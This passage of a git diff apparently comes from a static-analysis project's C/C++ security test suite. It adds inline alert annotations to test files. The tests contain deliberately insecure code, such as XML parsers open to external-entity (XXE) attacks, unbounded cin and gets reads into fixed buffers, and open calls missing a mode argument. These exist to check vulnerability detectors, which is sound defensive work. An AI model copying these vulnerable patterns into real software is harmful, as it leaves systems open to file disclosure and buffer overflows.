attack. | tests.cpp:122:23:122:43 | call to XercesDOMParser | XML parser | edges | tests2.cpp:20:17:20:31 | *new | tests2.cpp:22:2:22:2 | *p | provenance | | | tests2.cpp:20:17:20:31 | call to SAXParser | tests2.cpp:20:17:20:31 | *new | provenance | | @@ -185,34 +216,3 @@ nodes | tests.cpp:128:18:128:18 | *q | semmle.label | *q | subpaths | tests.cpp:126:18:126:18 | *q | tests.cpp:112:39:112:39 | *p | tests.cpp:112:39:112:39 | *p | tests.cpp:126:18:126:18 | test10_doParseB output argument | -#select -| tests2.cpp:22:2:22:2 | *p | tests2.cpp:20:17:20:31 | call to SAXParser | tests2.cpp:22:2:22:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests2.cpp:20:17:20:31 | call to SAXParser | XML parser | -| tests2.cpp:37:2:37:2 | *p | tests2.cpp:33:17:33:31 | call to SAXParser | tests2.cpp:37:2:37:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests2.cpp:33:17:33:31 | call to SAXParser | XML parser | -| tests2.cpp:51:2:51:2 | *p | tests2.cpp:49:12:49:12 | call to SAXParser | tests2.cpp:51:2:51:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests2.cpp:49:12:49:12 | call to SAXParser | XML parser | -| tests3.cpp:25:2:25:2 | *p | tests3.cpp:23:21:23:53 | *call to createXMLReader | tests3.cpp:25:2:25:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:23:21:23:53 | *call to createXMLReader | XML parser | -| tests3.cpp:38:2:38:6 | *p_3_3 | tests3.cpp:35:24:35:56 | *call to createXMLReader | tests3.cpp:38:2:38:6 | *p_3_3 | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:35:24:35:56 | *call to createXMLReader | XML parser | -| tests3.cpp:56:2:56:6 | *p_3_5 | tests3.cpp:48:24:48:56 | *call to createXMLReader | tests3.cpp:56:2:56:6 | *p_3_5 | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:48:24:48:56 | *call to createXMLReader | XML parser | -| tests3.cpp:63:2:63:2 | *p | tests3.cpp:60:21:60:53 | *call to createXMLReader | tests3.cpp:63:2:63:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:60:21:60:53 | *call to createXMLReader | XML parser | -| tests3.cpp:70:2:70:2 | *p | tests3.cpp:67:21:67:53 | *call to createXMLReader | tests3.cpp:70:2:70:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:67:21:67:53 | *call to createXMLReader | XML parser | -| tests4.cpp:26:34:26:48 | XML_PARSE_NOENT | tests4.cpp:26:34:26:48 | XML_PARSE_NOENT | tests4.cpp:26:34:26:48 | XML_PARSE_NOENT | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:26:34:26:48 | XML_PARSE_NOENT | XML parser | -| tests4.cpp:36:34:36:50 | XML_PARSE_DTDLOAD | tests4.cpp:36:34:36:50 | XML_PARSE_DTDLOAD | tests4.cpp:36:34:36:50 | XML_PARSE_DTDLOAD | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:36:34:36:50 | XML_PARSE_DTDLOAD | XML parser | -| tests4.cpp:46:34:46:68 | ... \| ... | tests4.cpp:46:34:46:68 | ... \| ... | tests4.cpp:46:34:46:68 | ... \| ... | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:46:34:46:68 | ... \| ... | XML parser | -| tests4.cpp:77:34:77:38 | flags | tests4.cpp:77:34:77:38 | flags | tests4.cpp:77:34:77:38 | flags | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:77:34:77:38 | flags | XML parser | -| tests4.cpp:130:39:130:55 | XML_PARSE_DTDLOAD | tests4.cpp:130:39:130:55 | XML_PARSE_DTDLOAD | tests4.cpp:130:39:130:55 | XML_PARSE_DTDLOAD | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:130:39:130:55 | XML_PARSE_DTDLOAD | XML parser | -| tests5.cpp:29:2:29:2 | *p | tests5.cpp:27:25:27:38 | *call to createLSParser | tests5.cpp:29:2:29:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:27:25:27:38 | *call to createLSParser | XML parser | -| tests5.cpp:43:2:43:2 | *p | tests5.cpp:40:25:40:38 | *call to createLSParser | tests5.cpp:43:2:43:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:40:25:40:38 | *call to createLSParser | XML parser | -| tests5.cpp:59:2:59:2 | *p | tests5.cpp:55:25:55:38 | *call to createLSParser | tests5.cpp:59:2:59:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:55:25:55:38 | *call to createLSParser | XML parser | -| tests5.cpp:77:2:77:5 | *g_p2 | tests5.cpp:70:17:70:30 | *call to createLSParser | tests5.cpp:77:2:77:5 | *g_p2 | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:70:17:70:30 | *call to createLSParser | XML parser | -| tests5.cpp:83:2:83:2 | *p | tests5.cpp:81:25:81:38 | *call to createLSParser | tests5.cpp:83:2:83:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:81:25:81:38 | *call to createLSParser | XML parser | -| tests5.cpp:89:2:89:2 | *p | tests5.cpp:81:25:81:38 | *call to createLSParser | tests5.cpp:89:2:89:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:81:25:81:38 | *call to createLSParser | XML parser | -| tests.cpp:17:2:17:2 | *p | tests.cpp:15:23:15:43 | call to XercesDOMParser | tests.cpp:17:2:17:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:15:23:15:43 | call to XercesDOMParser | XML parser | -| tests.cpp:31:2:31:2 | *p | tests.cpp:28:23:28:43 | call to XercesDOMParser | tests.cpp:31:2:31:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:28:23:28:43 | call to XercesDOMParser | XML parser | -| tests.cpp:39:2:39:2 | *p | tests.cpp:35:23:35:43 | call to XercesDOMParser | tests.cpp:39:2:39:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:35:23:35:43 | call to XercesDOMParser | XML parser | -| tests.cpp:56:2:56:2 | *p | tests.cpp:51:23:51:43 | call to XercesDOMParser | tests.cpp:56:2:56:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:51:23:51:43 | call to XercesDOMParser | XML parser | -| tests.cpp:60:2:60:2 | *p | tests.cpp:51:23:51:43 | call to XercesDOMParser | tests.cpp:60:2:60:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:51:23:51:43 | call to XercesDOMParser | XML parser | -| tests.cpp:69:2:69:2 | *p | tests.cpp:66:23:66:43 | call to XercesDOMParser | tests.cpp:69:2:69:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:66:23:66:43 | call to XercesDOMParser | XML parser | -| tests.cpp:80:2:80:2 | *p | tests.cpp:73:23:73:43 | call to XercesDOMParser | tests.cpp:80:2:80:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:73:23:73:43 | call to XercesDOMParser | XML parser | -| tests.cpp:88:3:88:3 | *q | tests.cpp:85:24:85:44 | call to XercesDOMParser | tests.cpp:88:3:88:3 | *q | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:85:24:85:44 | call to XercesDOMParser | XML parser | -| tests.cpp:104:3:104:3 | *q | tests.cpp:100:24:100:44 | call to XercesDOMParser | tests.cpp:104:3:104:3 | *q | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:100:24:100:44 | call to XercesDOMParser | XML parser | -| tests.cpp:113:2:113:2 | *p | tests.cpp:122:23:122:43 | call to XercesDOMParser | tests.cpp:113:2:113:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:122:23:122:43 | call to XercesDOMParser | XML parser | -| tests.cpp:117:2:117:2 | *p | tests.cpp:122:23:122:43 | call to XercesDOMParser | tests.cpp:117:2:117:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:122:23:122:43 | call to XercesDOMParser | XML parser | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-611/XXE.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-611/XXE.qlref index 866f8697cafe..185788f319dd 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-611/XXE.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-611/XXE.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-611/XXE.ql +query: Security/CWE/CWE-611/XXE.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests.cpp index 51ae57f54d9d..2c0e719c39b8 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests.cpp @@ -12,9 +12,9 @@ class XercesDOMParser: public AbstractDOMParser { // --- void test1(InputSource &data) { - XercesDOMParser *p = new XercesDOMParser(); + XercesDOMParser *p = new XercesDOMParser(); // $ Source - p->parse(data); // BAD (parser not correctly configured) + p->parse(data); // BAD (parser not correctly configured) // $ Alert } void test2(InputSource &data) { @@ -25,18 +25,18 @@ void test2(InputSource &data) { } void test3(InputSource &data) { - XercesDOMParser *p = new XercesDOMParser(); + XercesDOMParser *p = new XercesDOMParser(); // $ Source p->setDisableDefaultEntityResolution(false); - p->parse(data); // BAD (parser not correctly configured) + p->parse(data); // BAD (parser not correctly configured) // $ Alert } void test4(InputSource &data) { - XercesDOMParser *p = new XercesDOMParser(); + XercesDOMParser *p = new XercesDOMParser(); // $ Source p->setDisableDefaultEntityResolution(true); p->setCreateEntityReferenceNodes(false); - p->parse(data); // BAD (parser not correctly configured) + p->parse(data); // BAD (parser not correctly configured) // $ Alert } void test5(InputSource &data) { @@ -48,44 +48,44 @@ void test5(InputSource &data) { } void test6(InputSource &data) { - XercesDOMParser *p = new XercesDOMParser(); + XercesDOMParser *p = new XercesDOMParser(); // $ Source p->setDisableDefaultEntityResolution(true); p->parse(data); // GOOD p->setDisableDefaultEntityResolution(false); - p->parse(data); // BAD (parser not correctly configured) + p->parse(data); // BAD (parser not correctly configured) // $ Alert p->setDisableDefaultEntityResolution(true); p->parse(data); // GOOD p->setCreateEntityReferenceNodes(false); - p->parse(data); // BAD (parser not correctly configured) + p->parse(data); // BAD (parser not correctly configured) // $ Alert p->setCreateEntityReferenceNodes(true); p->parse(data); // GOOD } void test7(InputSource &data, bool cond) { - XercesDOMParser *p = new XercesDOMParser(); + XercesDOMParser *p = new XercesDOMParser(); // $ Source p->setDisableDefaultEntityResolution(cond); - p->parse(data); // BAD (parser may not be correctly configured) + p->parse(data); // BAD (parser may not be correctly configured) // $ Alert } void test8(InputSource &data, bool cond) { - XercesDOMParser *p = new XercesDOMParser(); + XercesDOMParser *p = new XercesDOMParser(); // $ Source if (cond) { p->setDisableDefaultEntityResolution(true); } - p->parse(data); // BAD (parser may not be correctly configured) + p->parse(data); // BAD (parser may not be correctly configured) // $ Alert } void test9(InputSource &data) { { - XercesDOMParser *p = new XercesDOMParser(); + XercesDOMParser *p = new XercesDOMParser(); // $ Source XercesDOMParser &q = *p; - q.parse(data); // BAD (parser not correctly configured) + q.parse(data); // BAD (parser not correctly configured) // $ Alert } { @@ -97,11 +97,11 @@ void test9(InputSource &data) { } { - XercesDOMParser *p = new XercesDOMParser(); + XercesDOMParser *p = new XercesDOMParser(); // $ Source XercesDOMParser &q = *p; p->setDisableDefaultEntityResolution(true); - q.parse(data); // GOOD [FALSE POSITIVE] + q.parse(data); // GOOD [FALSE POSITIVE] // $ Alert } } @@ -110,16 +110,16 @@ void test10_doParseA(XercesDOMParser *p, InputSource &data) { } void test10_doParseB(XercesDOMParser *p, InputSource &data) { - p->parse(data); // BAD (parser not correctly configured) + p->parse(data); // BAD (parser not correctly configured) // $ Alert } void test10_doParseC(XercesDOMParser *p, InputSource &data) { - p->parse(data); // BAD (parser may not be correctly configured) + p->parse(data); // BAD (parser may not be correctly configured) // $ Alert } void test10(InputSource &data) { XercesDOMParser *p = new XercesDOMParser(); - XercesDOMParser *q = new XercesDOMParser(); + XercesDOMParser *q = new XercesDOMParser(); // $ Source p->setDisableDefaultEntityResolution(true); test10_doParseA(p, data); diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests2.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests2.cpp index 8154536fd952..93b2f34f64d0 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests2.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests2.cpp @@ -17,9 +17,9 @@ class SAXParser // --- void test2_1(InputSource &data) { - SAXParser *p = new SAXParser(); + SAXParser *p = new SAXParser(); // $ Source - p->parse(data); // BAD (parser not correctly configured) + p->parse(data); // BAD (parser not correctly configured) // $ Alert } void test2_2(InputSource &data) { @@ -30,11 +30,11 @@ void test2_2(InputSource &data) { } void test2_3(InputSource &data) { - SAXParser *p = new SAXParser(); + SAXParser *p = new SAXParser(); // $ Source bool v = false; p->setDisableDefaultEntityResolution(v); - p->parse(data); // BAD (parser not correctly configured) + p->parse(data); // BAD (parser not correctly configured) // $ Alert } void test2_4(InputSource &data) { @@ -46,9 +46,9 @@ void test2_4(InputSource &data) { } void test2_5(InputSource &data) { - SAXParser p; + SAXParser p; // $ Source - p.parse(data); // BAD (parser not correctly configured) + p.parse(data); // BAD (parser not correctly configured) // $ Alert } void test2_6(InputSource &data) { diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests3.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests3.cpp index 064eadac4fa4..29b5a2b5e90d 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests3.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests3.cpp @@ -20,9 +20,9 @@ class XMLReaderFactory // --- void test3_1(InputSource &data) { - SAX2XMLReader *p = XMLReaderFactory::createXMLReader(); + SAX2XMLReader *p = XMLReaderFactory::createXMLReader(); // $ Source - p->parse(data); // BAD (parser not correctly configured) + p->parse(data); // BAD (parser not correctly configured) // $ Alert } void test3_2(InputSource &data) { @@ -32,10 +32,10 @@ void test3_2(InputSource &data) { p->parse(data); // GOOD } -SAX2XMLReader *p_3_3 = XMLReaderFactory::createXMLReader(); +SAX2XMLReader *p_3_3 = XMLReaderFactory::createXMLReader(); // $ Source void test3_3(InputSource &data) { - p_3_3->parse(data); // BAD (parser not correctly configured) + p_3_3->parse(data); // BAD (parser not correctly configured) // $ Alert } SAX2XMLReader *p_3_4 = XMLReaderFactory::createXMLReader(); @@ -45,7 +45,7 @@ void test3_4(InputSource &data) { p_3_4->parse(data); // GOOD } -SAX2XMLReader *p_3_5 = XMLReaderFactory::createXMLReader(); +SAX2XMLReader *p_3_5 = XMLReaderFactory::createXMLReader(); // $ Source void test3_5_init() { p_3_5->setFeature(XMLUni::fgXercesDisableDefaultEntityResolution, true); @@ -53,21 +53,21 @@ void test3_5_init() { void test3_5(InputSource &data) { test3_5_init(); - p_3_5->parse(data); // GOOD [FALSE POSITIVE] + p_3_5->parse(data); // GOOD [FALSE POSITIVE] // $ Alert } void test3_6(InputSource &data) { - SAX2XMLReader *p = XMLReaderFactory::createXMLReader(); + SAX2XMLReader *p = XMLReaderFactory::createXMLReader(); // $ Source p->setFeature(XMLUni::fgXercesDisableDefaultEntityResolution, false); - p->parse(data); // BAD (parser not correctly configured) + p->parse(data); // BAD (parser not correctly configured) // $ Alert } void test3_7(InputSource &data) { - SAX2XMLReader *p = XMLReaderFactory::createXMLReader(); + SAX2XMLReader *p = XMLReaderFactory::createXMLReader(); // $ Source p->setFeature(XMLUni::fgXercesHarmlessOption, true); - p->parse(data); // BAD (parser not correctly configured) + p->parse(data); // BAD (parser not correctly configured) // $ Alert } void test3_8(InputSource &data) { diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests4.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests4.cpp index 642c1866629b..bde073797ac1 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests4.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests4.cpp @@ -23,7 +23,7 @@ void xmlFreeDoc(xmlDoc *ptr); void test4_1(const char *fileName) { xmlDoc *p; - p = xmlReadFile(fileName, NULL, XML_PARSE_NOENT); // BAD (parser not correctly configured) + p = xmlReadFile(fileName, NULL, XML_PARSE_NOENT); // BAD (parser not correctly configured) // $ Alert if (p != NULL) { xmlFreeDoc(p); @@ -33,7 +33,7 @@ void test4_1(const char *fileName) { void test4_2(const char *fileName) { xmlDoc *p; - p = xmlReadFile(fileName, NULL, XML_PARSE_DTDLOAD); // BAD (parser not correctly configured) + p = xmlReadFile(fileName, NULL, XML_PARSE_DTDLOAD); // BAD (parser not correctly configured) // $ Alert if (p != NULL) { xmlFreeDoc(p); @@ -43,7 +43,7 @@ void test4_2(const char *fileName) { void test4_3(const char *fileName) { xmlDoc *p; - p = xmlReadFile(fileName, NULL, XML_PARSE_NOENT | XML_PARSE_DTDLOAD); // BAD (parser not correctly configured) + p = xmlReadFile(fileName, NULL, XML_PARSE_NOENT | XML_PARSE_DTDLOAD); // BAD (parser not correctly configured) // $ Alert if (p != NULL) { xmlFreeDoc(p); @@ -74,7 +74,7 @@ void test4_6(const char *fileName) { xmlDoc *p; int flags = XML_PARSE_NOENT; - p = xmlReadFile(fileName, NULL, flags); // BAD (parser not correctly configured) + p = xmlReadFile(fileName, NULL, flags); // BAD (parser not correctly configured) // $ Alert if (p != NULL) { xmlFreeDoc(p); @@ -127,7 +127,7 @@ void test4_10(const char *ptr, int sz) { void test4_11(const char *ptr, int sz) { xmlDoc *p; - p = xmlReadMemory(ptr, sz, "", NULL, XML_PARSE_DTDLOAD); // BAD (parser not correctly configured) + p = xmlReadMemory(ptr, sz, "", NULL, XML_PARSE_DTDLOAD); // BAD (parser not correctly configured) // $ Alert if (p != NULL) { xmlFreeDoc(p); diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests5.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests5.cpp index 063c47b025e4..b14a438ebb3b 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests5.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests5.cpp @@ -24,9 +24,9 @@ class DOMImplementationLS { // --- void test5_1(DOMImplementationLS *impl, InputSource &data) { - DOMLSParser *p = impl->createLSParser(); + DOMLSParser *p = impl->createLSParser(); // $ Source - p->parse(data); // BAD (parser not correctly configured) + p->parse(data); // BAD (parser not correctly configured) // $ Alert } void test5_2(DOMImplementationLS *impl, InputSource &data) { @@ -37,10 +37,10 @@ void test5_2(DOMImplementationLS *impl, InputSource &data) { } void test5_3(DOMImplementationLS *impl, InputSource &data) { - DOMLSParser *p = impl->createLSParser(); + DOMLSParser *p = impl->createLSParser(); // $ Source p->getDomConfig()->setParameter(XMLUni::fgXercesDisableDefaultEntityResolution, false); - p->parse(data); // BAD (parser not correctly configured) + p->parse(data); // BAD (parser not correctly configured) // $ Alert } void test5_4(DOMImplementationLS *impl, InputSource &data) { @@ -52,11 +52,11 @@ void test5_4(DOMImplementationLS *impl, InputSource &data) { } void test5_5(DOMImplementationLS *impl, InputSource &data) { - DOMLSParser *p = impl->createLSParser(); + DOMLSParser *p = impl->createLSParser(); // $ Source DOMConfiguration *cfg = p->getDomConfig(); cfg->setParameter(XMLUni::fgXercesDisableDefaultEntityResolution, false); - p->parse(data); // BAD (parser not correctly configured) + p->parse(data); // BAD (parser not correctly configured) // $ Alert } DOMImplementationLS *g_impl; @@ -67,26 +67,26 @@ void test5_6_init() { g_p1 = g_impl->createLSParser(); g_p1->getDomConfig()->setParameter(XMLUni::fgXercesDisableDefaultEntityResolution, true); - g_p2 = g_impl->createLSParser(); + g_p2 = g_impl->createLSParser(); // $ Source } void test5_6() { test5_6_init(); g_p1->parse(*g_data); // GOOD - g_p2->parse(*g_data); // BAD (parser not correctly configured) + g_p2->parse(*g_data); // BAD (parser not correctly configured) // $ Alert } void test5_7(DOMImplementationLS *impl, InputSource &data) { - DOMLSParser *p = impl->createLSParser(); + DOMLSParser *p = impl->createLSParser(); // $ Source - p->parse(data); // BAD (parser not correctly configured) + p->parse(data); // BAD (parser not correctly configured) // $ Alert p->getDomConfig()->setParameter(XMLUni::fgXercesDisableDefaultEntityResolution, true); p->parse(data); // GOOD p->getDomConfig()->setParameter(XMLUni::fgXercesDisableDefaultEntityResolution, false); - p->parse(data); // BAD (parser not correctly configured) + p->parse(data); // BAD (parser not correctly configured) // $ Alert } void test5_8(DOMImplementationLS *impl, InputSource &data) { diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-676/SAMATE/DangerousUseOfCin/DangerousUseOfCin.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-676/SAMATE/DangerousUseOfCin/DangerousUseOfCin.qlref index 5a35bf81fd99..a5067fc5ee1a 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-676/SAMATE/DangerousUseOfCin/DangerousUseOfCin.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-676/SAMATE/DangerousUseOfCin/DangerousUseOfCin.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-676/DangerousUseOfCin.ql +query: Security/CWE/CWE-676/DangerousUseOfCin.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-676/SAMATE/DangerousUseOfCin/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-676/SAMATE/DangerousUseOfCin/test.cpp index 704c2a87b3f3..a5d0d3019ae0 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-676/SAMATE/DangerousUseOfCin/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-676/SAMATE/DangerousUseOfCin/test.cpp @@ -56,7 +56,7 @@ void CWE676_Use_of_Potentially_Dangerous_Function__basic_17_bad() char charBuffer[CHAR_BUFFER_SIZE]; /* FLAW: using cin in an inherently dangerous fashion */ /* INCIDENTAL CWE120 Buffer Overflow since cin extraction is unbounded. */ - cin >> charBuffer; // BAD + cin >> charBuffer; // BAD // $ Alert charBuffer[CHAR_BUFFER_SIZE-1] = '\0'; printLine(charBuffer); } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/DangerousUseOfCin/DangerousUseOfCin.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/DangerousUseOfCin/DangerousUseOfCin.qlref index 5a35bf81fd99..a5067fc5ee1a 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/DangerousUseOfCin/DangerousUseOfCin.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/DangerousUseOfCin/DangerousUseOfCin.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-676/DangerousUseOfCin.ql +query: Security/CWE/CWE-676/DangerousUseOfCin.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/DangerousUseOfCin/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/DangerousUseOfCin/test.cpp index 4c5d4bb99bf7..75248ba1e978 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/DangerousUseOfCin/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/DangerousUseOfCin/test.cpp @@ -49,7 +49,7 @@ void bad() { char buffer[BUFFER_SIZE]; // BAD: Use of 'cin' without specifying the length of the input. - cin >> buffer; + cin >> buffer; // $ Alert buffer[BUFFER_SIZE-1] = '\0'; } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/PotentiallyDangerousFunction/DangerousFunctionOverflow.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/PotentiallyDangerousFunction/DangerousFunctionOverflow.qlref index e46499468514..41d5b35b3c97 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/PotentiallyDangerousFunction/DangerousFunctionOverflow.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/PotentiallyDangerousFunction/DangerousFunctionOverflow.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-676/DangerousFunctionOverflow.ql +query: Security/CWE/CWE-676/DangerousFunctionOverflow.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/PotentiallyDangerousFunction/PotentiallyDangerousFunction.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/PotentiallyDangerousFunction/PotentiallyDangerousFunction.qlref index 45388d46e2e3..8fb8f0fceafa 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/PotentiallyDangerousFunction/PotentiallyDangerousFunction.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/PotentiallyDangerousFunction/PotentiallyDangerousFunction.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-676/PotentiallyDangerousFunction.ql +query: Security/CWE/CWE-676/PotentiallyDangerousFunction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/PotentiallyDangerousFunction/test.c b/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/PotentiallyDangerousFunction/test.c index 34ca23748c84..f3629169bbc3 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/PotentiallyDangerousFunction/test.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-676/semmle/PotentiallyDangerousFunction/test.c @@ -28,7 +28,7 @@ char *asctime(const struct tm *timeptr); // Code under test int is_morning() { - struct tm *now = gmtime(time(NULL)); // BAD: gmtime uses shared state + struct tm *now = gmtime(time(NULL)); // BAD: gmtime uses shared state // $ Alert[cpp/potentially-dangerous-function] return (now->tm_hour < 12); } @@ -39,13 +39,13 @@ void testGets() { char *buf2 = malloc(1024); char *s; - gets(buf1); // BAD: use of gets - s = gets(buf2); // BAD: use of gets + gets(buf1); // BAD: use of gets // $ Alert[cpp/dangerous-function-overflow] + s = gets(buf2); // BAD: use of gets // $ Alert[cpp/dangerous-function-overflow] } void testTime() { - struct tm *now = localtime(time(NULL)); // BAD: localtime uses shared state - char *time_string = ctime(time(NULL)); // BAD: localtime uses shared state - char *time_string2 = asctime(now); // BAD: localtime uses shared state + struct tm *now = localtime(time(NULL)); // BAD: localtime uses shared state // $ Alert[cpp/potentially-dangerous-function] + char *time_string = ctime(time(NULL)); // BAD: localtime uses shared state // $ Alert[cpp/potentially-dangerous-function] + char *time_string2 = asctime(now); // BAD: localtime uses shared state // $ Alert[cpp/potentially-dangerous-function] } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-732/OpenCallMissingModeArgument.c b/cpp/ql/test/query-tests/Security/CWE/CWE-732/OpenCallMissingModeArgument.c index 61243f3db1a9..5bcdc9632d58 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-732/OpenCallMissingModeArgument.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-732/OpenCallMissingModeArgument.c @@ -17,13 +17,13 @@ void test_open() { open(a_file, O_NONBLOCK); // GOOD open(a_file, O_RDWR | O_CLOEXEC); // GOOD open(a_file, O_APPEND); // GOOD - open(a_file, O_CREAT); // BAD + open(a_file, O_CREAT); // BAD // $ Alert[cpp/open-call-with-mode-argument] open(a_file, O_CREAT, 0); // GOOD - open(a_file, O_TMPFILE); // BAD + open(a_file, O_TMPFILE); // BAD // $ Alert[cpp/open-call-with-mode-argument] open(a_file, O_TMPFILE, 0); // GOOD openat(0, a_file, O_APPEND); // GOOD - openat(0, a_file, O_CREAT); // BAD + openat(0, a_file, O_CREAT); // BAD // $ Alert[cpp/open-call-with-mode-argument] openat(0, a_file, O_CREAT, 0); // GOOD - openat(0, a_file, O_TMPFILE); // BAD + openat(0, a_file, O_TMPFILE); // BAD // $ Alert[cpp/open-call-with-mode-argument] openat(0, a_file, O_TMPFILE, 0); // GOOD } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-732/OpenCallMissingModeArgument.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-732/OpenCallMissingModeArgument.qlref index 68198ec2a3b1..e1ff489c2430 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-732/OpenCallMissingModeArgument.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-732/OpenCallMissingModeArgument.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-732/OpenCallMissingModeArgument.ql \ No newline at end of file +query: Security/CWE/CWE-732/OpenCallMissingModeArgument.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-732/UnsafeDaclSecurityDescriptor.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-732/UnsafeDaclSecurityDescriptor.cpp index f2f7d80e44a2..09a32989a5ac 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-732/UnsafeDaclSecurityDescriptor.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-732/UnsafeDaclSecurityDescriptor.cpp @@ -67,13 +67,13 @@ void Test() { PSECURITY_DESCRIPTOR 